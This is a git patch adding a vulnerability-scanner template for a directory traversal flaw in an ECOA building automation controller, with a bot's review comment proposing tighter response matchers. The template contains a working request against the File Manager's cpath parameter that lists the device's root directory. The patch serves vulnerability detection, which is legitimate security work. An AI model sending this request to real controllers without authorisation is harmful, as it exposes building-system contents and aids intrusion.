From fac7f96b342abba0eb37d570fc51e3c03f0cf9a7 Mon Sep 17 00:00:00 2001
From: GwanYeong Kim
Date: Sat, 25 Sep 2021 08:58:58 +0900
Subject: [PATCH] Create ecoa-building-directory-traversal.yaml

The BAS controller suffers from a directory traversal content disclosure vulnerability. Using the GET parameter cpath in File Manager (fmangersub), attackers can disclose directory content on the affected device

Signed-off-by: GwanYeong Kim
---
.../ecoa-building-directory-traversal.yaml | 23 +++++++++++++++++++
1 file changed, 23 insertions(+)
create mode 100644 vulnerabilities/other/ecoa-building-directory-traversal.yaml

diff --git a/vulnerabilities/other/ecoa-building-directory-traversal.yaml b/vulnerabilities/other/ecoa-building-directory-traversal.yaml
new file mode 100644
index 0000000000..0fa43d3146
--- /dev/null
+++ b/vulnerabilities/other/ecoa-building-directory-traversal.yaml
@@ -0,0 +1,23 @@
+id: ecoa-building-directory-traversal
+
+info:
+ name: ECOA Building Automation System - Directory Traversal Content Disclosure
+ author: gy741
+ severity: high
+ description: The BAS controller suffers from a directory traversal content disclosure vulnerability. Using the GET parameter cpath in File Manager (fmangersub), attackers can disclose directory content on the affected device
+ reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5670.php
+ tags: ecoa,traversal
+
+requests:
+ - raw:
+ - |
+ GET /fmangersub?cpath=/ HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers:
+ - type: word
+ words:
+ - "bacevent.elf"
+ - "redown.elf"
+ - "system.bin"
+ condition: and
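Review bot: The `matchers` block relies on a single word matcher with no response-status check and no explicit `part`, so any response that merely echoes the three filenames (an error page, a documentation mirror, a decoy service) would be reported as a high-severity finding. Adding `matchers-condition: and` with a `type: status` matcher, and pinning the word matcher to `part: body`, tightens the signal. This assumes the device answers 200 for the listing, which the hunk does not show, so confirm it against a known-affected unit. Separately, `reference` is written as a scalar where a YAML list is the usual form, and the `description` lacks its final period.

```yaml
    # … unchanged: raw GET request …
    matchers-condition: and
    matchers:
      - type: word
        part: body
        # … unchanged: words list and condition: and …
      - type: status
        status:
          - 200
```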